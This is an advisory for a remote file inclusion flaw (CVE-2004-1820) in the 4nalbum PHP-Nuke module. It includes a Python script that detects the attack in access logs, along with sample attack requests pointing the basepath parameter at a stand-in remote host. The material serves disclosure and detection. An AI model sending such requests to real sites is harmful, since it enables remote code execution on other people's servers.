PT-2004-2719 · Php Nuke · 4Nalbum

Janek Vind +1 · Published 2004-03-15 · Updated 2017-07-11 · CVE-2004-1820

CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions

4nalbum version 0.92 for PHP-Nuke 6.5 through 7.0

Description

A remote file inclusion vulnerability in displaycategory.php allows remote attackers to execute arbitrary PHP code by modifying the basepath parameter to reference a URL on a remote web server that contains fileFunctions.php.

Recommendations

For 4nalbum version 0.92, consider restricting access to the displaycategory.php file until a patch is available. As a temporary workaround, avoid using the basepath parameter in the affected API endpoint until the issue is resolved.
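
A log check for the request pattern described above, added here as an example (it is not part of the original advisory or of the 4nalbum code). It assumes Apache-style access logs; the sample lines, the `/album/` path and the `remote.example` host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A basepath value that starts with a URL scheme (http://, ftp://, ...)
# names a remote resource rather than a local directory.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

def find_rfi_attempts(log_lines):
    """Return (line_number, decoded_basepath) for requests to
    displaycategory.php whose basepath parameter is a remote URL."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        # Match the script name as a path segment, case-insensitively.
        if "displaycategory.php" not in target.path.lower().split("/"):
            continue
        # parse_qsl percent-decodes once, as the web server would.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key == "basepath" and REMOTE_RE.match(value):
                hits.append((n, value))
    return hits

# Constructed sample log lines (not taken from a real incident).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2004:10:00:01 +0000] "GET /album/displaycategory.php?gid=3 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [15/Mar/2004:10:02:14 +0000] "GET /album/displaycategory.php?basepath=http://remote.example/ HTTP/1.0" 200 312',
    '192.0.2.77 - - [15/Mar/2004:10:02:20 +0000] "GET /album/displaycategory.php?basepath=hTTp%3A%2F%2Fremote.example%2F HTTP/1.1" 200 312',
    '192.0.2.10 - - [15/Mar/2004:10:03:00 +0000] "GET /album/displaycategory.php?basepath=modules/album/ HTTP/1.0" 200 5120',
    '192.0.2.45 - - [15/Mar/2004:10:04:09 +0000] "GET /index.php?basepath=http://remote.example/ HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for line_no, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"line {line_no}: basepath -> {value}")
```

Access logs record only the request line, so a basepath value sent in a POST body is not visible to this check.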


Related Identifiers

CVE-2004-1820

Affected Products

4Nalbum